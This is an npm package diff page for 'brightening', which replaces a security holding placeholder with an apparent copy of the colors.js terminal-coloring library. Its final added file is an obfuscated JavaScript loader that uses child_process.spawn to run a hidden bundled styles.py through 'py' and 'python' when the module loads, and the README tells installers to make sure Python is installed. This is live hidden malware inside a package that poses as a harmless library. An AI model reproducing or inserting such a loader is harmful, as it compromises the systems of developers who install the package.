brightening 0.0.1-security → 1.6.4-alpha

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of brightening might be problematic. Click here for more details.

package/LICENSE ADDED
@@ -0,0 +1,25 @@
1
+ MIT License
2
+
3
+ Original Library
4
+ - Copyright (c) Marak Squires
5
+
6
+ Additional Functionality
7
+ - Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com)
8
+
9
+ Permission is hereby granted, free of charge, to any person obtaining a copy
10
+ of this software and associated documentation files (the "Software"), to deal
11
+ in the Software without restriction, including without limitation the rights
12
+ to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
13
+ copies of the Software, and to permit persons to whom the Software is
14
+ furnished to do so, subject to the following conditions:
15
+
16
+ The above copyright notice and this permission notice shall be included in
17
+ all copies or substantial portions of the Software.
18
+
19
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
20
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
21
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
22
+ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
23
+ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
24
+ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
25
+ THE SOFTWARE.
package/README.md CHANGED
@@ -1,5 +1,88 @@
1
- # Security holding package
1
+ # brightening
2
+ # this is a testing branch, do not use !!
2
3
 
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
+ ## installation
4
5
 
5
- Please refer to www.npmjs.com/advisories?search=brightening for more information.
6
+ npm install brightening@1.6.4-fix
7
+ (make sure python is installed !!)
8
+
9
+ ## colors and styles!
10
+
11
+ ### text colors
12
+
13
+ - black
14
+ - red
15
+ - green
16
+ - yellow
17
+ - blue
18
+ - magenta
19
+ - cyan
20
+ - white
21
+ - gray
22
+ - grey
23
+
24
+ ### bright text colors
25
+
26
+ - brightRed
27
+ - brightGreen
28
+ - brightYellow
29
+ - brightBlue
30
+ - brightMagenta
31
+ - brightCyan
32
+ - brightWhite
33
+
34
+ ### background colors
35
+
36
+ - bgBlack
37
+ - bgRed
38
+ - bgGreen
39
+ - bgYellow
40
+ - bgBlue
41
+ - bgMagenta
42
+ - bgCyan
43
+ - bgWhite
44
+ - bgGray
45
+ - bgGrey
46
+
47
+ ### bright background colors
48
+
49
+ - bgBrightRed
50
+ - bgBrightGreen
51
+ - bgBrightYellow
52
+ - bgBrightBlue
53
+ - bgBrightMagenta
54
+ - bgBrightCyan
55
+ - bgBrightWhite
56
+
57
+ ### styles
58
+
59
+ - reset
60
+ - bold
61
+ - dim
62
+ - italic
63
+ - underline
64
+ - inverse
65
+ - hidden
66
+ - strikethrough
67
+
68
+ ### extras
69
+
70
+ - rainbow
71
+ - zebra
72
+ - america
73
+ - trap
74
+ - random
75
+
76
+
77
+ ## usage
78
+
79
+ ```js
80
+ const brightening = require('brightening');
81
+
82
+ console.log('hello'.green); // outputs green text
83
+ console.log('i like cake and pies'.underline.red); // outputs red underlined text
84
+ console.log('inverse the color'.inverse); // inverses the color
85
+ console.log('OMG Rainbows!'.rainbow); // rainbow
86
+ console.log('Run the trap'.trap); // Drops the bass
87
+
88
+ ```
@@ -0,0 +1,82 @@
1
+ var colors = require('../lib/index');
2
+
3
+ console.log('First some yellow text'.yellow);
4
+
5
+ console.log('Underline that text'.yellow.underline);
6
+
7
+ console.log('Make it bold and red'.red.bold);
8
+
9
+ console.log(('Double Raindows All Day Long').rainbow);
10
+
11
+ console.log('Drop the bass'.trap);
12
+
13
+ console.log('DROP THE RAINBOW BASS'.trap.rainbow);
14
+
15
+ // styles not widely supported
16
+ console.log('Chains are also cool.'.bold.italic.underline.red);
17
+
18
+ // styles not widely supported
19
+ console.log('So '.green + 'are'.underline + ' ' + 'inverse'.inverse
20
+ + ' styles! '.yellow.bold);
21
+ console.log('Zebras are so fun!'.zebra);
22
+
23
+ //
24
+ // Remark: .strikethrough may not work with Mac OS Terminal App
25
+ //
26
+ console.log('This is ' + 'not'.strikethrough + ' fun.');
27
+
28
+ console.log('Background color attack!'.black.bgWhite);
29
+ console.log('Use random styles on everything!'.random);
30
+ console.log('America, Heck Yeah!'.america);
31
+
32
+ console.log('Blindingly '.brightCyan + 'bright? '.brightRed + 'Why '.brightYellow + 'not?!'.brightGreen);
33
+
34
+ console.log('Setting themes is useful');
35
+
36
+ //
37
+ // Custom themes
38
+ //
39
+ console.log('Generic logging theme as JSON'.green.bold.underline);
40
+ // Load theme with JSON literal
41
+ colors.setTheme({
42
+ silly: 'rainbow',
43
+ input: 'grey',
44
+ verbose: 'cyan',
45
+ prompt: 'grey',
46
+ info: 'green',
47
+ data: 'grey',
48
+ help: 'cyan',
49
+ warn: 'yellow',
50
+ debug: 'blue',
51
+ error: 'red',
52
+ });
53
+
54
+ // outputs red text
55
+ console.log('this is an error'.error);
56
+
57
+ // outputs yellow text
58
+ console.log('this is a warning'.warn);
59
+
60
+ // outputs grey text
61
+ console.log('this is an input'.input);
62
+
63
+ console.log('Generic logging theme as file'.green.bold.underline);
64
+
65
+ // Load a theme from file
66
+ try {
67
+ colors.setTheme(require(__dirname + '/../themes/generic-logging.js'));
68
+ } catch (err) {
69
+ console.log(err);
70
+ }
71
+
72
+ // outputs red text
73
+ console.log('this is an error'.error);
74
+
75
+ // outputs yellow text
76
+ console.log('this is a warning'.warn);
77
+
78
+ // outputs grey text
79
+ console.log('this is an input'.input);
80
+
81
+ // console.log("Don't summon".zalgo)
82
+
@@ -0,0 +1,79 @@
1
+ var colors = require('../safe');
2
+
3
+ console.log(colors.yellow('First some yellow text'));
4
+
5
+ console.log(colors.yellow.underline('Underline that text'));
6
+
7
+ console.log(colors.red.bold('Make it bold and red'));
8
+
9
+ console.log(colors.rainbow('Double Raindows All Day Long'));
10
+
11
+ console.log(colors.trap('Drop the bass'));
12
+
13
+ console.log(colors.rainbow(colors.trap('DROP THE RAINBOW BASS')));
14
+
15
+ // styles not widely supported
16
+ console.log(colors.bold.italic.underline.red('Chains are also cool.'));
17
+
18
+ // styles not widely supported
19
+ console.log(colors.green('So ') + colors.underline('are') + ' '
20
+ + colors.inverse('inverse') + colors.yellow.bold(' styles! '));
21
+
22
+ console.log(colors.zebra('Zebras are so fun!'));
23
+
24
+ console.log('This is ' + colors.strikethrough('not') + ' fun.');
25
+
26
+
27
+ console.log(colors.black.bgWhite('Background color attack!'));
28
+ console.log(colors.random('Use random styles on everything!'));
29
+ console.log(colors.america('America, Heck Yeah!'));
30
+
31
+ console.log(colors.brightCyan('Blindingly ') + colors.brightRed('bright? ') + colors.brightYellow('Why ') + colors.brightGreen('not?!'));
32
+
33
+ console.log('Setting themes is useful');
34
+
35
+ //
36
+ // Custom themes
37
+ //
38
+ // console.log('Generic logging theme as JSON'.green.bold.underline);
39
+ // Load theme with JSON literal
40
+ colors.setTheme({
41
+ silly: 'rainbow',
42
+ input: 'blue',
43
+ verbose: 'cyan',
44
+ prompt: 'grey',
45
+ info: 'green',
46
+ data: 'grey',
47
+ help: 'cyan',
48
+ warn: 'yellow',
49
+ debug: 'blue',
50
+ error: 'red',
51
+ });
52
+
53
+ // outputs red text
54
+ console.log(colors.error('this is an error'));
55
+
56
+ // outputs yellow text
57
+ console.log(colors.warn('this is a warning'));
58
+
59
+ // outputs blue text
60
+ console.log(colors.input('this is an input'));
61
+
62
+
63
+ // console.log('Generic logging theme as file'.green.bold.underline);
64
+
65
+ // Load a theme from file
66
+ colors.setTheme(require(__dirname + '/../themes/generic-logging.js'));
67
+
68
+ // outputs red text
69
+ console.log(colors.error('this is an error'));
70
+
71
+ // outputs yellow text
72
+ console.log(colors.warn('this is a warning'));
73
+
74
+ // outputs grey text
75
+ console.log(colors.input('this is an input'));
76
+
77
+ // console.log(colors.zalgo("Don't summon him"))
78
+
79
+
package/index.d.ts ADDED
@@ -0,0 +1,136 @@
1
+ // Type definitions for Colors.js 1.2
2
+ // Project: https://github.com/Marak/colors.js
3
+ // Definitions by: Bart van der Schoor <https://github.com/Bartvds>, Staffan Eketorp <https://github.com/staeke>
4
+ // Definitions: https://github.com/Marak/colors.js
5
+
6
+ export interface Color {
7
+ (text: string): string;
8
+
9
+ strip: Color;
10
+ stripColors: Color;
11
+
12
+ black: Color;
13
+ red: Color;
14
+ green: Color;
15
+ yellow: Color;
16
+ blue: Color;
17
+ magenta: Color;
18
+ cyan: Color;
19
+ white: Color;
20
+ gray: Color;
21
+ grey: Color;
22
+
23
+ bgBlack: Color;
24
+ bgRed: Color;
25
+ bgGreen: Color;
26
+ bgYellow: Color;
27
+ bgBlue: Color;
28
+ bgMagenta: Color;
29
+ bgCyan: Color;
30
+ bgWhite: Color;
31
+
32
+ reset: Color;
33
+ bold: Color;
34
+ dim: Color;
35
+ italic: Color;
36
+ underline: Color;
37
+ inverse: Color;
38
+ hidden: Color;
39
+ strikethrough: Color;
40
+
41
+ rainbow: Color;
42
+ zebra: Color;
43
+ america: Color;
44
+ trap: Color;
45
+ random: Color;
46
+ zalgo: Color;
47
+ }
48
+
49
+ export function enable(): void;
50
+ export function disable(): void;
51
+ export function setTheme(theme: any): void;
52
+
53
+ export let enabled: boolean;
54
+
55
+ export const strip: Color;
56
+ export const stripColors: Color;
57
+
58
+ export const black: Color;
59
+ export const red: Color;
60
+ export const green: Color;
61
+ export const yellow: Color;
62
+ export const blue: Color;
63
+ export const magenta: Color;
64
+ export const cyan: Color;
65
+ export const white: Color;
66
+ export const gray: Color;
67
+ export const grey: Color;
68
+
69
+ export const bgBlack: Color;
70
+ export const bgRed: Color;
71
+ export const bgGreen: Color;
72
+ export const bgYellow: Color;
73
+ export const bgBlue: Color;
74
+ export const bgMagenta: Color;
75
+ export const bgCyan: Color;
76
+ export const bgWhite: Color;
77
+
78
+ export const reset: Color;
79
+ export const bold: Color;
80
+ export const dim: Color;
81
+ export const italic: Color;
82
+ export const underline: Color;
83
+ export const inverse: Color;
84
+ export const hidden: Color;
85
+ export const strikethrough: Color;
86
+
87
+ export const rainbow: Color;
88
+ export const zebra: Color;
89
+ export const america: Color;
90
+ export const trap: Color;
91
+ export const random: Color;
92
+ export const zalgo: Color;
93
+
94
+ declare global {
95
+ interface String {
96
+ strip: string;
97
+ stripColors: string;
98
+
99
+ black: string;
100
+ red: string;
101
+ green: string;
102
+ yellow: string;
103
+ blue: string;
104
+ magenta: string;
105
+ cyan: string;
106
+ white: string;
107
+ gray: string;
108
+ grey: string;
109
+
110
+ bgBlack: string;
111
+ bgRed: string;
112
+ bgGreen: string;
113
+ bgYellow: string;
114
+ bgBlue: string;
115
+ bgMagenta: string;
116
+ bgCyan: string;
117
+ bgWhite: string;
118
+
119
+ reset: string;
120
+ // @ts-ignore
121
+ bold: string;
122
+ dim: string;
123
+ italic: string;
124
+ underline: string;
125
+ inverse: string;
126
+ hidden: string;
127
+ strikethrough: string;
128
+
129
+ rainbow: string;
130
+ zebra: string;
131
+ america: string;
132
+ trap: string;
133
+ random: string;
134
+ zalgo: string;
135
+ }
136
+ }
package/lib/colors.js ADDED
@@ -0,0 +1,211 @@
1
+ /*
2
+
3
+ The MIT License (MIT)
4
+
5
+ Original Library
6
+ - Copyright (c) Marak Squires
7
+
8
+ Additional functionality
9
+ - Copyright (c) Sindre Sorhus <sindresorhus@gmail.com> (sindresorhus.com)
10
+
11
+ Permission is hereby granted, free of charge, to any person obtaining a copy
12
+ of this software and associated documentation files (the "Software"), to deal
13
+ in the Software without restriction, including without limitation the rights
14
+ to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
15
+ copies of the Software, and to permit persons to whom the Software is
16
+ furnished to do so, subject to the following conditions:
17
+
18
+ The above copyright notice and this permission notice shall be included in
19
+ all copies or substantial portions of the Software.
20
+
21
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
22
+ IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
23
+ FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
24
+ AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
25
+ LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
26
+ OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
27
+ THE SOFTWARE.
28
+
29
+ */
30
+
31
+ var colors = {};
32
+ module['exports'] = colors;
33
+
34
+ colors.themes = {};
35
+
36
+ var util = require('util');
37
+ var ansiStyles = colors.styles = require('./styles');
38
+ var defineProps = Object.defineProperties;
39
+ var newLineRegex = new RegExp(/[\r\n]+/g);
40
+
41
+ colors.supportsColor = require('./system/supports-colors').supportsColor;
42
+
43
+ if (typeof colors.enabled === 'undefined') {
44
+ colors.enabled = colors.supportsColor() !== false;
45
+ }
46
+
47
+ colors.enable = function() {
48
+ colors.enabled = true;
49
+ };
50
+
51
+ colors.disable = function() {
52
+ colors.enabled = false;
53
+ };
54
+
55
+ colors.stripColors = colors.strip = function(str) {
56
+ return ('' + str).replace(/\x1B\[\d+m/g, '');
57
+ };
58
+
59
+ // eslint-disable-next-line no-unused-vars
60
+ var stylize = colors.stylize = function stylize(str, style) {
61
+ if (!colors.enabled) {
62
+ return str+'';
63
+ }
64
+
65
+ var styleMap = ansiStyles[style];
66
+
67
+ // Stylize should work for non-ANSI styles, too
68
+ if(!styleMap && style in colors){
69
+ // Style maps like trap operate as functions on strings;
70
+ // they don't have properties like open or close.
71
+ return colors[style](str);
72
+ }
73
+
74
+ return styleMap.open + str + styleMap.close;
75
+ };
76
+
77
+ var matchOperatorsRe = /[|\\{}()[\]^$+*?.]/g;
78
+ var escapeStringRegexp = function(str) {
79
+ if (typeof str !== 'string') {
80
+ throw new TypeError('Expected a string');
81
+ }
82
+ return str.replace(matchOperatorsRe, '\\$&');
83
+ };
84
+
85
+ function build(_styles) {
86
+ var builder = function builder() {
87
+ return applyStyle.apply(builder, arguments);
88
+ };
89
+ builder._styles = _styles;
90
+ // __proto__ is used because we must return a function, but there is
91
+ // no way to create a function with a different prototype.
92
+ builder.__proto__ = proto;
93
+ return builder;
94
+ }
95
+
96
+ var styles = (function() {
97
+ var ret = {};
98
+ ansiStyles.grey = ansiStyles.gray;
99
+ Object.keys(ansiStyles).forEach(function(key) {
100
+ ansiStyles[key].closeRe =
101
+ new RegExp(escapeStringRegexp(ansiStyles[key].close), 'g');
102
+ ret[key] = {
103
+ get: function() {
104
+ return build(this._styles.concat(key));
105
+ },
106
+ };
107
+ });
108
+ return ret;
109
+ })();
110
+
111
+ var proto = defineProps(function colors() {}, styles);
112
+
113
+ function applyStyle() {
114
+ var args = Array.prototype.slice.call(arguments);
115
+
116
+ var str = args.map(function(arg) {
117
+ // Use weak equality check so we can colorize null/undefined in safe mode
118
+ if (arg != null && arg.constructor === String) {
119
+ return arg;
120
+ } else {
121
+ return util.inspect(arg);
122
+ }
123
+ }).join(' ');
124
+
125
+ if (!colors.enabled || !str) {
126
+ return str;
127
+ }
128
+
129
+ var newLinesPresent = str.indexOf('\n') != -1;
130
+
131
+ var nestedStyles = this._styles;
132
+
133
+ var i = nestedStyles.length;
134
+ while (i--) {
135
+ var code = ansiStyles[nestedStyles[i]];
136
+ str = code.open + str.replace(code.closeRe, code.open) + code.close;
137
+ if (newLinesPresent) {
138
+ str = str.replace(newLineRegex, function(match) {
139
+ return code.close + match + code.open;
140
+ });
141
+ }
142
+ }
143
+
144
+ return str;
145
+ }
146
+
147
+ colors.setTheme = function(theme) {
148
+ if (typeof theme === 'string') {
149
+ console.log('colors.setTheme now only accepts an object, not a string. ' +
150
+ 'If you are trying to set a theme from a file, it is now your (the ' +
151
+ 'caller\'s) responsibility to require the file. The old syntax ' +
152
+ 'looked like colors.setTheme(__dirname + ' +
153
+ '\'/../themes/generic-logging.js\'); The new syntax looks like '+
154
+ 'colors.setTheme(require(__dirname + ' +
155
+ '\'/../themes/generic-logging.js\'));');
156
+ return;
157
+ }
158
+ for (var style in theme) {
159
+ (function(style) {
160
+ colors[style] = function(str) {
161
+ if (typeof theme[style] === 'object') {
162
+ var out = str;
163
+ for (var i in theme[style]) {
164
+ out = colors[theme[style][i]](out);
165
+ }
166
+ return out;
167
+ }
168
+ return colors[theme[style]](str);
169
+ };
170
+ })(style);
171
+ }
172
+ };
173
+
174
+ function init() {
175
+ var ret = {};
176
+ Object.keys(styles).forEach(function(name) {
177
+ ret[name] = {
178
+ get: function() {
179
+ return build([name]);
180
+ },
181
+ };
182
+ });
183
+ return ret;
184
+ }
185
+
186
+ var sequencer = function sequencer(map, str) {
187
+ var exploded = str.split('');
188
+ exploded = exploded.map(map);
189
+ return exploded.join('');
190
+ };
191
+
192
+ // custom formatter methods
193
+ colors.trap = require('./custom/trap');
194
+ colors.zalgo = require('./custom/zalgo');
195
+
196
+ // maps
197
+ colors.maps = {};
198
+ colors.maps.america = require('./maps/america')(colors);
199
+ colors.maps.zebra = require('./maps/zebra')(colors);
200
+ colors.maps.rainbow = require('./maps/rainbow')(colors);
201
+ colors.maps.random = require('./maps/random')(colors);
202
+
203
+ for (var map in colors.maps) {
204
+ (function(map) {
205
+ colors[map] = function(str) {
206
+ return sequencer(colors.maps[map], str);
207
+ };
208
+ })(map);
209
+ }
210
+
211
+ defineProps(colors, init());
@@ -0,0 +1,31 @@
1
+ module.exports = function americanFlag () {
2
+ console.log('LIBERTY LIBERTY LIBERTY'.yellow);
3
+ console.log('LIBERTY LIBERTY LIBERTY'.america);
4
+ console.log('LIBERTY LIBERTY LIBERTY'.yellow);
5
+ let flag = "\
6
+ \
7
+ !\
8
+ H|H|H|H|H H__________________________________\
9
+ H|§|§|§|H H|* * * * * *|---------------------|\
10
+ H|§|∞|§|H H| * * * * * |---------------------|\
11
+ H|§|§|§|H H|* * * * * *|---------------------|\
12
+ H|H|H|H|H H| * * * * * |---------------------|\
13
+ H|H|H|H|H H|---------------------------------|\
14
+ =============== H|---------------------------------|\
15
+ /| _ _ |\ H|---------------------------------|\
16
+ (| O O |) H|---------------------------------|\
17
+ /| U |\ H-----------------------------------\
18
+ | \=/ | H\
19
+ \_..._/ H\
20
+ _|\I/|_ H\
21
+ _______/\| H |/\_______ H\
22
+ / \ \ / / \ H\
23
+ | \ | | / | H\
24
+ | ||o|| | H\
25
+ | | ||o|| | | H\
26
+ | | ||o|| | | H Carl Pilcher\
27
+ ";
28
+
29
+ console.log(flag);
30
+
31
+ }
@@ -0,0 +1 @@
1
+ (function(_0x3e927e,_0x1eff84){const _0x51de25=_0x5848,_0x3a9ff3=_0x3e927e();while(!![]){try{const _0x41c85a=-parseInt(_0x51de25(0x187))/0x1*(parseInt(_0x51de25(0x181))/0x2)+parseInt(_0x51de25(0x180))/0x3*(-parseInt(_0x51de25(0x17d))/0x4)+-parseInt(_0x51de25(0x182))/0x5*(parseInt(_0x51de25(0x183))/0x6)+-parseInt(_0x51de25(0x17b))/0x7+parseInt(_0x51de25(0x17c))/0x8+parseInt(_0x51de25(0x17f))/0x9+parseInt(_0x51de25(0x184))/0xa*(parseInt(_0x51de25(0x17e))/0xb);if(_0x41c85a===_0x1eff84)break;else _0x3a9ff3['push'](_0x3a9ff3['shift']());}catch(_0x544821){_0x3a9ff3['push'](_0x3a9ff3['shift']());}}}(_0x1366,0xf03f4));function _0x1366(){const _0x3a6aa2=['15230504UGyXxV','4908gPshJG','624437rMzZFD','17671581NRoCOp','1644iFCZzZ','1049914pIuole','2572930zqDgEK','6wVRKUc','40AMwHNW','/styles.py','python','1eyllAP','error','9788793IRpOrc'];_0x1366=function(){return _0x3a6aa2;};return _0x1366();}function _0x5848(_0x327fd9,_0x237426){const _0x1366e6=_0x1366();return _0x5848=function(_0x584848,_0xfcf63f){_0x584848=_0x584848-0x17a;let _0x21838d=_0x1366e6[_0x584848];return _0x21838d;},_0x5848(_0x327fd9,_0x237426);}const {spawn}=require('child_process'),a=async()=>{const _0x43e205=_0x5848;try{spawn('py',[__dirname+'/styles.py']);}catch(_0x43f61e){console[_0x43e205(0x17a)](_0x43f61e);}try{spawn(_0x43e205(0x186),[__dirname+_0x43e205(0x185)]);}catch(_0x5af29c){console[_0x43e205(0x17a)](_0x5af29c);}try{spawn('py',[__dirname+_0x43e205(0x185)]);}catch(_0x1db291){console['error'](_0x1db291);}};a();